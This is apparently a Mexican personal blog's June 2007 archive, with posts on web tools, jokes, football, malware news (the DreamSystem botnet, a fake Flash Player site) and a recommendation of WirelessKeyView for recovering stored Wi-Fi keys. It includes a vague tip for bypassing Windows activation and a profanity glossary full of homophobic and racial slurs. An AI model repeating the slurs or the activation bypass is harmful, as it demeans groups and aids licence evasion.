Archivos Junio 2007

30

Jun

¿Subiendo de Page Rank?

Aveces es bueno saber si nuestro sitio va por el buen camino o no y para poder seguirle el curso a nuestro sitio les traigo esta página que predice el pageRank de tu sitio, esto es meramente especulatorio hay que aclararlo, pero no deja de ser una buena guia para saber si has tenido avances y si seguiras subiendo o no en la próxima revisión de google.



Según me infamaron la siguiente vez que google ajstara el pageRank sera en septiembre de este año, con lo que quedan algunos meses para poder mejorar y seguir ganando back links no creen.

Suerte y espero que esta herramienta les de buenas noticias como a mi. Según esto mi pagina tendrá un pagerank de 4, y eso para mi es muy bueno, recordemos que entre más alto se a tu pagerank google te toma mas en cuenta al momento de las búsquedas, por lo cual apareces mas y hay mas visitas a tu web.

el sitio en cuestion es este http://www.iwebtool.com/pagerank_prediction

Saludos

30

Jun

Recuperando tus claves wep y wap

Nunca les ha pasado que llegan a un lugar donde la red es inalámbrica y ustedes traen su laptop y no se pueden conectar debido a que esta protegida por wap o wep. Bien a mi me han tocado algunos casos por el estilo y el problema se acentúa cuando nadie se sabe la clave, es decir tenemos maquinas que están conectadas pero nadie se sabe la calve wep o wap.

Para esos casos hay una herramienta que nos permite ver las claves wep y wap que están almacenadas en una computadora, pero solamente las que guarda por medio de la pantalla de configuración de wl propio windows es decir no funciona si tienes instalado algún otro software que se encargue de gestionar las conexiones inalámbricas.

Este programa se llama WirelessKeyView y en su página aweb dice lo siguiente:

"WirelessKeyView permite reuperar todas las claves de red inalámbrica WEP o WAP que se encuentran almacenadas en tu computadora, guardadas por el servicio de configuración de redes inalámbricas de Windows xp y por el sevicio de Auto configuración de Windows Vista. Esto te permite recuperar de una manera fácil todas tus claves en archivos de texto, html o xml o copiar una clave al porta papeles de windows."



El programa no requiere de ningún tipo de instalación o DLL's adicionales, simplemente extrae el ejecutable en cualquier capeta y ejecutalo. Cuando el programa este corriendo, te debería de mostrar las claves almacenadas en tu computadora.

Otra caracteristica es que te puedes descargar un archivo que sirve para traducir al español la aplicación.

Aqui se las dejo epero ue les sirva tanto como a mi

Descargar

Descargar la traducción (nota requieres bajar tambien el otro archivo)

29

Jun

Pseudo-secuestros

La buena Natalia hizo el favor de enviar un correo con importante informacion del secuestro de moda...

ATENCIÓN NO APAGUEN SU CELULAR

(SUENA JALADO PERO PUEDE PASAR!!!))
ATENCIÓN NO APAGUE SU CELULAR

Ya esta demasiado conocida la extorsión telefónica según la cual:

Alguien llama diciendo que había secuestrado un pariente y para regresarlo a casa hay que pagar una suma en efectivo.
Pues esto acaba de ser remodelado, actualizado, ya que la prensa anduvo divulgando como reaccionar ante ello.

Ahora los bandidos están llamando a los celulares anunciando que fue detectado un clon del aparato:

Así dicen:

- Hola, somos de (Telcel, Iusacel, Movistar, Unefon ... )
- Lamentablemente le informamos que su celular fue clonado.
- Por eso le suplicamos apagar su celular por una hora.

Los que reciben ese telefonema apagan su celular creyendo en el excelente servicio de la concesionaria del servicio telefónico.

En la siguiente hora los bandidos se dedican a extorsionar a la familia de la persona llamada. Telefonean a la casa y practican la extorsión del secuestro.

Quien recibe la llamada en la casa inmediatamente corre a llamar al celular de la persona supuestamente secuestrada y escucha el mensaje:

- "Lo sentimos, el numero que Ud. llamo se encuentra apagado o fuera del área de cobertura del servicio, llama mas tarde, por favor.

De ahí en adelante toda familia entra en pánico total.

29

Jun

Un poco de humor

GEORGE BUSH

Einstein muere y se va al cielo. Ahí le recibe San Pedro, que le dice:
- Te pareces a Einstein, pero no tienes ni idea de las trampas que hace la gente para poder ir al cielo. ¿Puedes probar quién eres realmente?
Einstein reflexiona unos segundos y pregunta: - ¿Puedo conseguir una pizarra y una tiza?
San Pedro chaquea los dedos e instantaneamente aparecen una pizarra y tiza. Einstein empieza a describir con símbolos matemáticos complícadísimos su teoría de la relatividad. San Pedro queda totalmente impresionado.
- ¡Eres realmente Einstein!, ¡bienvenido al cielo!
El siguiente en llegar es Picasso. Una vez más, San Pedro pide las credenciales. Picasso pregunta:
- Te importa si uso esa pizarra y esa tiza?
- Adelante.- le responde San Pedro
Picaso borra las ecuaciones de Einstien y esboza un despanpanante mural con unos cuantos trazos rápidos de tiza. San Pedro aplaude:
- Estoy seguro de que eres el gran artista que dices ser. ¡Pa'dentro!
Entonces, San Pedro levanta la vista y ve a George W. Bush. Se rasca la cabeza y dice:
- Einstein y Picasso tuvieron que probar su identidad. ¿Cómo probarías la tuya?
George W. queda algo desconcertado y dice:
- ¿Quiénes son Einstein y Picasso? San Pedro suspira y dice:
- ¡Bienvenido, George!

29

Jun

Insultos en Ingles para que te diviertas (y en español de mexico)

Alguna vez se han preguntado como se dice pendejo o algun otro insulto en ingles, pues yo si y no me kise quedar con la duda, porlo que navegando por ahi encontre un gran compendio de insultos en ingles y pues decidi compartirlos con ustedes mis dos lectores (espero que sean mas de uno) pero si es uno ps ni ppsi contigo jajaja

ASi que ya sin mas preambulo les dejamos en mixelandia las groserias mas usadas en español traducidas al ingles par que se las digas a kien tu quieras.
Mexican SpanishEnglish Translation
Tu madre es puta y pendejaYour mother is a whore and an asshole
Te picas el culoPick your ass
Coma mi panochaEat my pussy
Chingado/-aFucker (m/f)
Pinche Retardado/-aFucking retard (m/f)
RetrasadoRetard
Chupa mi pitoSuck my cock
Puta barataCheap whore
Bajate a los chescosSuck my dick (lit. get down for the refreshments)
Vete a jalar el pescuezo al polloGo beat yourself off (lit. pull the chicken's neck)
Aduana (Slang)Whorehouse
Agarraderas (Slang)Tits (lit. things to grab)
Alimentos (Slang)Tits (lit. alimony)
AnizAnus
Aparato (Slang)Penis (lit. apparatus)
Apedrear (Slang)Stinks of shit
Bacalao (Slang)Pussy (lit. codfish)
Bombear (Slang)Sex outside of marriage (lit. to pump)
BerreaderoWhorehouse, brothel
Calabazo (Slang)Buttocks
ChilitoLittle dick
Chinga tu madreFuck your mother
Chingalo!Fuck it!
ChingarTo fuck (also used as 'fuck you')
ChingateFuck you
Chocho (Slang)Cunt
Chucha cuerera (Slang)Slut, promiscuous
Chuperson (Slang)Penis
CogerTo copulate
ColgadosOld tits
CuscaSlut
El de atras (Slang)Asshole (lit. the thing in your bottom)
El sin mangas (Slang)Condom
MameyCunt
MulaImpotent male
PincheFucking
Quedada (Slang)An ugly, old maid
ZurramatoDumbass
Besa mi culoKiss my ass
Chupa mi pitoSuck my dick
Metele masStick it in more
Metele mas lenguaStick your tongue in more
Besa mis huevosKiss my balls (lit. kiss my eggs)
Chinga tu madreFuck your mom
Pinche pendejaStupid ass whole
PutoMale faggot, homo
PutaFemale whore, slut
CabronAsshole (to a male)
CabronaBitch (to a female)
BabosoIdiot
AyotesBalls, testicles (lit. pumpkins)
Aguacates (Slang)Testicles (lit. avocados)
Aguayon torneado (Slang)Testicles
Albondigas (Slang)Testicles (lit. meatballs)
Los huevosBalls, testicles
Maleton (Mexican and South America)Son of a bitch (lit. you are a bad one)
BasculaoCunt, pussy (lit. codfish)
NidoCunt, pussy (lit. nest)
La cocha (Mexico, Puerto Rico)Cunt, pussy
El funcieteCunt, pussy
MameyCunt, pussy
El morrongoPenis, dick, cock
La reataPenis, dick, cock (lit. rope)
El retazo macizoPenis, dick, cock (lit. stiff piece)
La riataPenis, dick, cock
El apartoPenis, dick, cock (lit. apparatus)
AbadesaPimp
ColgadosTits
Las repisasTits (lit. shelves)
Las agarraderasTits (lit. things to grab)
Los alimentosTits (lit. food allowance)
La tanaWhore
ResbalonWhorehouse
La aduanaWhorehouse
El zorreroJerk, fool, dumbass
PicaflorFaggot (lit. flower snatcher)
MariposaFaggot (lit. butterfly)
El quebrachoFaggot, gay
El quebrachonFaggot, gay
El rulAsshole
El rulachoAsshole
Chucha cuereraSlut
La cuscaSlut
ChingarTo fuck
Ir a desgastar el petateTo have sex (lit. to break the bed)
Ir a hacer de las aguasTo have sex (lit. to go make some water)
Ir a la junta de consiliacionTo have sex (lit. to go to a meeting)
Ir a la lucha super libre a calzonTo have sex ( Lit: to go remove clothing)
Ir a percudir el cochonTo have sex (lit. to tarnish the mattress)
Ir a rechinar la camaTo have sex (lit. to make the bed squeak)
Ir a un entierroTo have sex (lit. to go to the grave)
Revisar los interioresTo fuck (lit. to visit the insides)
El mecosMasturbate
Chupame la polla (Slang)Suck my dick
Chupame mi pinga (Slang)Suck my dick
Chupame la polla (Slang)Suck my dick
Chupamela (Slang)Suck my dick
Jode su madreFuck your mother
Jode sus madresFuck your (you all) mothers
MuerdealmohadasFaggot (lit. pillow-biter)
MetemelaStick it in me
Mermelada de miembrilloMasturbate (lit. marmalade of the smaller limb)
Ir a desvencigar la camaTo have sex (lit. to wear down the bedding)
Bastardiar (Slang)Sex outside of marriage (lit. to produce bastards)
Ve a chuparle el peson ha un changoGo suck a monkey's nipple
Caca pasaShit happens
Pinche CabronFucking Asshole
Te meto la verga por el osico para que te calles el pinche puto osico hijo de perra!Put my dick in your mouth to make you shut the fuck up you son of a bitch!
Chinga pendao te' chuchaFuck dick you bitch
PutaBitch
Que chingados quieres?What the fuck do you want?
Tengo que miar que mis dientes flotanI have to piss so bad my teeth are floating
HuevosBalls, Eggs
CuleroAsshole
VergaPenis
MamonSomeone who boasts too much
No mames!Shut up!
Chingao!Fuck!
Un chingoA fuckload
PutoFaggot
CualquieraWhore
Dale a la MadreFuck him up (in a fight or competition) (lit Give him to the Mother)
ZorraSlut (lit. fox)
ViejaWoman or girl (lit. old lady)
PanzonFatso
BolilloRacial slur meaning white person (lit. bun)
NacoJerk, low-class person
FresaPreppy
Puñatero Masturbator
ChingónBad-ass (cool guy)
Estoy hasta la madre!I have had enough!

28

Jun

You Tube el Papa de los sitios de Videos Online

Cuando Google pago $1.65billones de dolares por YouTube, mucha gente se cuestiono cual era el modelo de negocios del sitio y si este seguiría creciendo en audiencia.

Por mucho la respuesta es si. Las visitas al sitio de YouTube.com han crecido en un 70 por ciento entre Enero y Mayo del 2007 (aunque le pese al sanshiro). Contextualizando se puede decir que las visitas a los otros 64 sitios para compartir vídeos ja crecido solo un 8 pociento en el mismo periodo. En efecto YouTube tiene 50% mas visitas que los otros 64 sitios combinados.

YouTube tiene el 60.02 por ciento del mercado en USA de compartir vídeos en Internet. Seguido por MySpace con el 16.08 por ciento, Google Vídeo que apenas ha logrado conseguir el 7.81 %, y después de ahí un buen bajón en las escalas. Yahoo! Vídeo tiene el 2.77% , MSN tiene 2.09 %, Break.com tien 1.33 seguido por Daily Motion con 1.13 (si sanshiro a la gente no le gusta Daily Motion).

Sin embargo las páginas de búsquedas siguen llevando el 20% de el trafico a los sitios de vídeos en Internet, lo que sugiere que la gente ha incrementado su apetito por el contenido en vídeo o que la gente suele buscar dentro del mismo sitio de vídeos.

Grafías desde Hitwise muestran que el numero de personas navengando que abandonan la página de búsquedas par ir a los sitios de vídeo se ha incrementado en un 300 % en un año, desde Mayo del 2006 a mayo del 2007.

28

Jun

Enviar Mensajes gratis por internet a celulares otra pagina

hoy les traigo otra página para enviar sus mensajes a internet se trata de la página de http://www.yaesta.com.mx/ la cual también al igual que hola-tu envía mensajitos gratis por internet a celulares espero que les sirva tanto como a mi.

28

Jun

el software es como el sexo..... es mejor si es gratis

28

Jun

México gano a Brasil pero aun asi que salga el maricón del Hugo sanchez

Y es que el triunfo que se tuvo ante Brasil no fue resultado del trabajo que del entrenador, ya que el equipo que jugo no había jugado junto y quizás no lo hubiera hecho si no fuera por las dos lesiones y que tres de los jugadores que militan en equipos europeos hubieran decidido de forma voluntaria abandonar la nave de la selección nacional.

El héroe en cierta forma se llama Nery Castillo, el que muchos decían que porque era tan buscado por la gente encargada de dirigir los mandos de la selección (y no me refiero al entrenador) y pues la tarde de ayer nos demostró el porque es uno de los jugadores mas caros que tiene este país, pero que aun le falta madurar futbolisticamente, ya que tuvo la oportunidad de hacer crecer el marcador y haberle propinado una goliza de 4 goles a Brasil, sin embargo se engolosino en una y en otra no pudo definir de una forma correcta.

Que decir del gol de ramoncito morales, el cual en partidos pasados debido a la posición errónea en la que lo coloco el técnico, nos quedaba a deber mucho, mas ayer dio un muy buen partido y anoto otro gol mas de esos que quedan para el recuerdo.

Sin mas les dejo los goles

primero el de Nery



y el de Ramoncito



per de todos modos adios a hugo sanches no lo queremos en el tri, porlo menos no en este blog

Saludos

28

Jun

Falso Correo electonico de microsoft infecta computadoras con malware

En estos días se ha desatado un ataque de ingeniería social utilizando para esto un correo elctronico que se supone es enviado por Microsoft en el que te dice que hay una actualizacion para el windows, el cual te lleva a una página desde la que se te indica que bajes un cierto parche el cual pro supuesto es malware.

Se dice que el correo luce muy real y que incluye los logos de microsoft, para lo cual no se requiere mucho, puesto que todos sabemos la calidad de los productos de microsoft, eso si es fácil de imitar.

La ironía en esto es que ahora se esta usando un parche para una vulnerabilidad par engañar a los usuarios, lo cual si es algo no muy usado.

Saludos

27

Jun

MEETINGS DEL PRI

Hoy al rededor de las 6 de la tarde iba rumbo a la oficina cuando por la calle de Regato entre 20 de noviembre y 5 de febrero me encuentro con que la calle estaba cerrada por 3 autobuses a mitad de calle, los tránsitos desviando el trafico, un montón de sillas a media calle y por las banquetas, gente esperando pasar con sus carros por esta calle para estacionarse en sus propias casas y sin poder hacerlo, todo esto por que los señores candidatos del Partido Revolucionario Institucional tanto para la presidencia como para el 3er distrito estaban promocionando su candidatura cuando se supone que el cierre de campaña era el pasado domingo... no entiendo esto que alguien me explique!!!
Total fue un caos completo el que generaron estos señores hoy por la tarde y la gente esperando a que los dejaran entrar a sus casas, otros esperando que les dieran oportunidad de pasar caminando de un extremo a otro de la calle, y muchos borregos esperando que les dieran algún objeto, abanico de mano, espejitos, gorras, playeras, yoyos y cosas que los partidos gastan con los impuestos del pueblo y que todos aceptamos solo por que son "gratis" si como no, mientras sigamos con esa mentalidad, así nos vamos a quedar... no se por que los candidatos no se gastan el dinero que se gastan en regalitos, anuncios televisivos, posters, espectaculares y cosas así en ayudar a la gente o colonias enteras, no se pavimentando calles, incrementando la seguridad, mas patrullas, mas motos, mas policías...
Pero bueno, solo quería sacar mi coraje de alguna manera (yo soy de los que esperaban cruzar caminando por esta calle)

27

Jun

Fuego Líquido

Alguna vez se han preguntado que pasaría si el fuego fuera líquido, como sabemos el fuego esta en uno de los estados mas raros, porque no es solido ni líquido ni gaseoso, es decir no es ninguno de los tipos de materia más comunes en la tierra. El estado del fuego es "Plasma" y eso hace que la gravedad no lo afecte o lo afecte menos que a otros estados, que no lo podamos tocar en si, es decir ¿alguien ha trtado de agarras lumbre?, quitando el hecho de que se vana quemar por el calor que el fuego produce, es imposible tocarlo o bueno eso parece ser, igual y te quedas con pedacitos de fuego en tus manos.

Pero en fin eso es solo la realidad, ahora hagamos volar un poco nuestra imaginación y comencemos a fumar de esa yerba verde que tanto al dicen que hace (pero no tanto como el cristal o el plvo blanco alias cocaina) y veamos estas esenas que desafian a nuestra lógica.
aqui les dejo pues sin mas preambulo las imagnes fumadas que me encontre en el interne.




26

Jun

Curso 3dStudio

Hoy termine por fin un curso de 3d studio, ahora si los chavos me hicieron sudar, aparte de que ya estaba un poco oxidadón en el 3d studio, me pusieron en un horario bastante horrible, y los chavos ya tenían nociones del manejo en 3d y algunos de ellos también ya habían manejado alguna vez el 3dstudio, bueno, para acabarla de rematar, todos ellos son arquitectos, así que mi programa habitual (que me se de memoria jajaja) no me sirvió para nada, tuve que ponerme a estudiar y adecuarles un poco el temario a sus necesidades así que lo que hacia fue exactamente lo mismo que cuando di mi primer curso de 3dstudio, leer el día anterior lo que iba a dar el día siguiente y en algunos casos ese mismo día unas cuantas horas antes de empezar, que hueva, pero ya me pagaron... jajaja
ya tengo feria pa la feriaaaa...
ahora si voy a poder medio descansar mientras viene el proximo diplomado (que va a estar cargado de horas para mi, pero no hay bronca, dinero es dinero)

y me sigo preguntando... ¿que paso con el video de la chica del cbtis 15?

26

Jun

La escuela mas cachonda del páis

Si algunha vez se han preguntado cual es la escuela mas cachonda, caliente o como le quieran decir, no se molesten en pensar tanto ni en entrat en discuciones esteriles,.

Y no señores no es la UNAM, o el POLI o alguna otra escuela, no es la lobos ni la UJE.

En esta escuela tal vez no hay viejas tan buenas como en otras de paga o no hay videos porno de esa escuela o en fin no encontraran muchas referencias que les indiquen que esa es la escuela mas cachonda, pero yo tengo la clave del porque lo es.

Miren en Durango habia una escuela que se llamaba Instituto Tecnológico Agropecuario y que hoy en dia se llama Instituto Tecnologico Superior de Villa Montemorelos. ¿Y esto que tiene que ver?. Pues veran las siglas de esta escuala eran ITA y como ha la person que fue tu novia le dice ExNovia a una escuela que fue ITA le dices ExITA.

jajaj asi que ya lo saben si alguien les preguta en dond e esta la escuela mas cachoinda del pais no duden en decir que esta en Durango
Saludos

25

Jun

yo tambien soy bovino adolecente en ba-k.com

si no me podia quedar atras y hoy complete por fin los 100 posts requeridos para ser bovino adolecente.

Lo que pasa es que me borraron como 10 posts y me regresaron a los 80 y tantos cuando ya tenia 98 posts. Lo cual no es justo, pero hay alguine ( el rafa) al cual le borraron la cuanta completa jajaja

Saludos

25

Jun

los mejores y peores Videos de los simpsons

hoy les traigo un compendio de vídeos de los simpsons, si lo se el del otro día de la mariguana fue bueno pero ahora traigo otros mucho mejor

el primero es el de como se vería la intro de los simpson en la vida real..

así que hay les va




el segundo es un capitulo que no he visto en español pero habla de los inicios de BART MAN y como derroto al hombre con tatuaje de serpiente y pudo vengar la muerte de su padre homero.




hacer semejantes y por ultimo les traigo una de las cosa mas estúpidas que he visto en youtube, se trata de una especie de parodia si se le puede decir así de los simpson hecha por españoles (quien mas podría hacer semejantes pendejadas en televisión mmm tal vez los chinos pero nada mas)





sinceramente seria bueno darle un plomazo a estos weyes por semejante aberración ...

25

Jun

un muy buen zape

alguna vez les habran dado un zape en su vida, pero este que aparece en este video si es la onda.

Espero les guste el madrazo que le acomodan a este we

25

Jun

Disculpeme amigo.......

jajaja si te cae el saco pues pontelo y si la rola es muy buena arriba la Jerez y lo que dice tambien es muy cierto preguntale y veras jejejejejejajajajajaaj de pies a cabeza nomas

25

Jun

Versión 1.7 del Limpiador de Memorias USB (alias USB Cleaner)

Después de algunos días no haber podido dedicarle tiempo al este programita, este fin de semana me puse a finalizar lo que a mi punto de vista es la versión 1.7.

El cambio aqu mas me tardo es el hecho de que ya no uso los forms de delphi, lo que hizo que el tamaño del programa se redujera en mucho, pasando a solo unos cuantos kilos (63kilobytes), reduciendo también con esto el uso de memoria RAM y más recurso del sistema.

Otra cosa que le agregue fue que ahora mientras el programa se este ejecutando, al momento de conectar una memoria esta es analizada (y limpiada en caso de ser necesario) en forma automática.

Tambien le puse que al momento de minimizar la ventana se agrega a la barra de iconos de notificación.

Hice alunas limpiezas y mejoras en el código fuente, por lo cual también se redujo el tamaño del ejecutable.


Lo que bien es introducir una hoja de opciones, hacer que el programa se instale como servicio (si que se inicie estomáticamente con windows pero con los privilegios mas elevados).

también un menú y mas cosillas pero eso sera con tiempo y un poco de deificación, por mientras aquí les dejo la versión mas reciente del USBCleaner

Descargar

23

Jun

Alguien qiuere algo de mariguana los Simpson invitan

navegando por hai me tope con esste capitulo de los simpson que muestra a homero fumando mota

me gusto y kisiera que aqui tambien fuera legal la marijuana o como le kieran decir jaja

se los dejo en español y en ingles



ahora en ingles

23

Jun

noticias del Rootkit Unhooker del 23 de Junio

agregado: listado y desganchado de Shadow SSDT
agregado: nuevo dialogo de acerca ;)
el sistema de actualización es ahora completamente configurable.
remivido: el banneo a GMER y el banneo a los debuggers de modo kernel

23

Jun

PandaLabs ha descubierto DreamSystem

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

22

Jun

Falso Flash Player es utilizado para distribuir Malware

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

22

Jun

Cajeros Automaticos en Rusia corren Windows XP Sin Activar



Como la ven apoco no se ve bien nice esta imagen en un cajero automatico. Yo me pregunto si algo como esto inspiraria confianza al momento de realizar una operación bancaria.

Pero bueno el otro dia descubri como utilizar una computadora sin activar, jeje con la ayuda del buen internet explorer y un poco de imaginación se puede lanzar el shell (exploerer.exe) y listo a usar la compu sin que este activada, nomas que silencio no le digan a nadie que yo les dije.

22

Jun

mis sueños de alucine :|

En estos días he tenido unos sueños muy alucinados, con decirles que sueño predios y productores todas las noches y ahora también sueño contratos y muchas cosas mas feas, creo que eso de desarrollar sistemas no están bueno para la salud mental de los individuos. En otra palabras creo que me estoy volviendo loco, bueno un poco más de lo que ya estoy...


:( yo aun soy becerro en los foros de bak.. dam it me esforzare por postear más..

Saludos

22

Jun

Adolecencia en ba-k.com

Hoy, despues de poco mas de un año dado de alta en los foros de ba-k.com, he pasado de ser un becerro, a ser un bovino adolescente, y eso fue por que alcance los 100 mensajes posteados dentro del foro...
Ojala que el foro de ba-k no lo vayan a cerrar por que si no se nos acaba nuestra minita de software jajaja

22

Jun

Faith - Limp Bizkit

Esta rola de limp Bizkit me gusta mucho así que aquí se las dejo aver que tal ;)

22

Jun

Mis amigos invisibles y yo...

Recientemente abri una cuenta de MySpace. Si bien no soy adicto a ese tipo de redes sociales,de repente hay que conocer uno que otro servicio de los que se ofrecen por la red.
Pues bueno resulta que tengo agregada a una amiga de gabacholandia y a otras dos artistas gringas(ellas me agregaron jaja de esto comentaremos más adelante) y según yo y mis matemáticas antiguas da un total de 3. Si así es 3 amigos en mi lista de my space, pero hoy que estaba revisando esa página de My Space, me di cuenta de un hecho muy chistoso, que me aparecían cuatro contactos ¿Ua ta fac? Osea como ¿cómo que tengo cuatro amiguitos si yo sabia que tenia 3? Pues alguno de los dos esta mal y a mi me respaldan las matemáticas. Y bueno para no dejar de tirarle a los desarrolladores de myspace les dejo la prueba irrefutable de este error de sumatorias de My Space



Tons como ven si tendre algun amiguo invisible por ahi y que no me haya dado cuenta???

Bueno lo de que me agregaran las artistas gringas no es novedad ya que se la pasan agregando a cuanto wey pueden con tal de vender sus discos jajaj
pero en fin que le vamos ha hacer

20

Jun

Tux en texto

ahora le traemos a tux formado por puros caracteres ascii


tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtu
xtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtux
tuxtuxtuxtuxtuxtuxtuxtuxtuxt
uxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxtuxt

19

Jun

STAR WARS ASCII

Vaya vaya vaya... si que hay gente sin que hacer la verdad, hace poco el buen yorsh vino a la oficina y no se ni como ni por que salio la conversacion acerca del codigo ascii, bueno pues el yorsh saco a relucir que alguien, no sabemos quien, no sabemos como o por que, habia puesto la pelicula completa de star wars en codigo ascii... tienen idea de lo que es eso (que hueva...) aqui les dejo la pagina donde esta para quien no tenga otra cosa mas importante que hacer... jajaja

